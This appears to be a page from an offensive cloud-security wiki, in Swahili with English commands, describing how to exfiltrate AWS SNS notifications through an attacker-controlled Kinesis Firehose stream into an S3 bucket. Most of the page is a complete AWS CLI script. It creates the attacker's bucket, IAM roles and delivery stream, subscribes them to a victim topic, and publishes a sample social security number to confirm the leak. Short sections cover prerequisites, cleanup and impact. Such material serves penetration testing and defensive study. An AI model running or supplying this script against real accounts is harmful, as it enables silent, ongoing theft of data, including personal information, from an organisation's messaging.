AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)

Reading time: 4 minutes

Matumizi mabaya ya protocol ya subscription ya Firehose ili kusajili Kinesis Data Firehose delivery stream inayodhibitiwa na mshambuliaji kwenye topic ya kawaida ya SNS ya mwathiriwa. Mara subscription itakapokuwa mahali na role ya IAM inayohitajika ikiamini sns.amazonaws.com, kila notification ijayo itaandikwa kwa kudumu ndani ya S3 bucket ya mshambuliaji kwa kelele ndogo sana.

Mahitaji

• Idhini katika akaunti ya mshambuliaji za kuunda S3 bucket, Firehose delivery stream, na role ya IAM inayotumika na Firehose (firehose:*, iam:CreateRole, iam:PutRolePolicy, s3:PutBucketPolicy, etc.).
• Uwezo wa sns:Subscribe kwa topic ya mwathiriwa (na hiari sns:SetSubscriptionAttributes ikiwa subscription role ARN inatolewa baada ya kuundwa).
• Sera ya topic inayomruhusu principal wa mshambuliaji ku-subscribe (au mshambuliaji tayari anafanya kazi ndani ya akaunti ile ile).

Attack Steps (same-account example)

REGION=us-east-1
ACC_ID=$(aws sts get-caller-identity --query Account --output text)
SUFFIX=$(date +%s)

# 1) Create attacker S3 bucket and Firehose delivery stream
ATTACKER_BUCKET=ht-firehose-exfil-$SUFFIX
aws s3 mb s3://$ATTACKER_BUCKET --region $REGION

STREAM_NAME=ht-firehose-stream-$SUFFIX
FIREHOSE_ROLE_NAME=FirehoseAccessRole-$SUFFIX

# Role Firehose assumes to write into the bucket
aws iam create-role --role-name "$FIREHOSE_ROLE_NAME" --assume-role-policy-document '{
"Version": "2012-10-17",
"Statement": [{"Effect": "Allow","Principal": {"Service": "firehose.amazonaws.com"},"Action": "sts:AssumeRole"}]
}'

cat > /tmp/firehose-s3-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":["s3:AbortMultipartUpload","s3:GetBucketLocation","s3:GetObject","s3:ListBucket","s3:ListBucketMultipartUploads","s3:PutObject"],"Resource":["arn:aws:s3:::$ATTACKER_BUCKET","arn:aws:s3:::$ATTACKER_BUCKET/*"]}]}
JSON
aws iam put-role-policy --role-name "$FIREHOSE_ROLE_NAME" --policy-name AllowS3Writes --policy-document file:///tmp/firehose-s3-policy.json

aws firehose create-delivery-stream \
--delivery-stream-name "$STREAM_NAME" \
--delivery-stream-type DirectPut \
--s3-destination-configuration RoleARN=arn:aws:iam::$ACC_ID:role/$FIREHOSE_ROLE_NAME,BucketARN=arn:aws:s3:::$ATTACKER_BUCKET \
--region $REGION >/dev/null

# 2) IAM role SNS assumes when delivering into Firehose
SNS_ROLE_NAME=ht-sns-to-firehose-role-$SUFFIX
aws iam create-role --role-name "$SNS_ROLE_NAME" --assume-role-policy-document '{
"Version": "2012-10-17",
"Statement": [{"Effect": "Allow","Principal": {"Service": "sns.amazonaws.com"},"Action": "sts:AssumeRole"}]
}'

cat > /tmp/allow-firehose.json <<JSON
{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":["firehose:PutRecord","firehose:PutRecordBatch"],"Resource":"arn:aws:firehose:$REGION:$ACC_ID:deliverystream/$STREAM_NAME"}]}
JSON
aws iam put-role-policy --role-name "$SNS_ROLE_NAME" --policy-name AllowFirehoseWrites --policy-document file:///tmp/allow-firehose.json

SNS_ROLE_ARN=arn:aws:iam::$ACC_ID:role/$SNS_ROLE_NAME

# 3) Subscribe Firehose to the victim topic
TOPIC_ARN=<VICTIM_TOPIC_ARN>
aws sns subscribe \
--topic-arn "$TOPIC_ARN" \
--protocol firehose \
--notification-endpoint arn:aws:firehose:$REGION:$ACC_ID:deliverystream/$STREAM_NAME \
--attributes SubscriptionRoleArn=$SNS_ROLE_ARN \
--region $REGION

# 4) Publish test message and confirm arrival in S3
aws sns publish --topic-arn "$TOPIC_ARN" --message 'pii:ssn-123-45-6789' --region $REGION
sleep 90
aws s3 ls s3://$ATTACKER_BUCKET/ --recursive

Usafishaji

• Futa subscription ya SNS, Firehose delivery stream, role/policy za IAM za muda, na S3 bucket ya mshambuliaji.

Athari

Athari Inayowezekana: Uondoaji wa kudumu na unaoendelea wa kila ujumbe uliotangazwa kwenye SNS topic iliyolengwa hadi hifadhi inayodhibitiwa na mshambuliaji kwa athari ndogo za uendeshaji.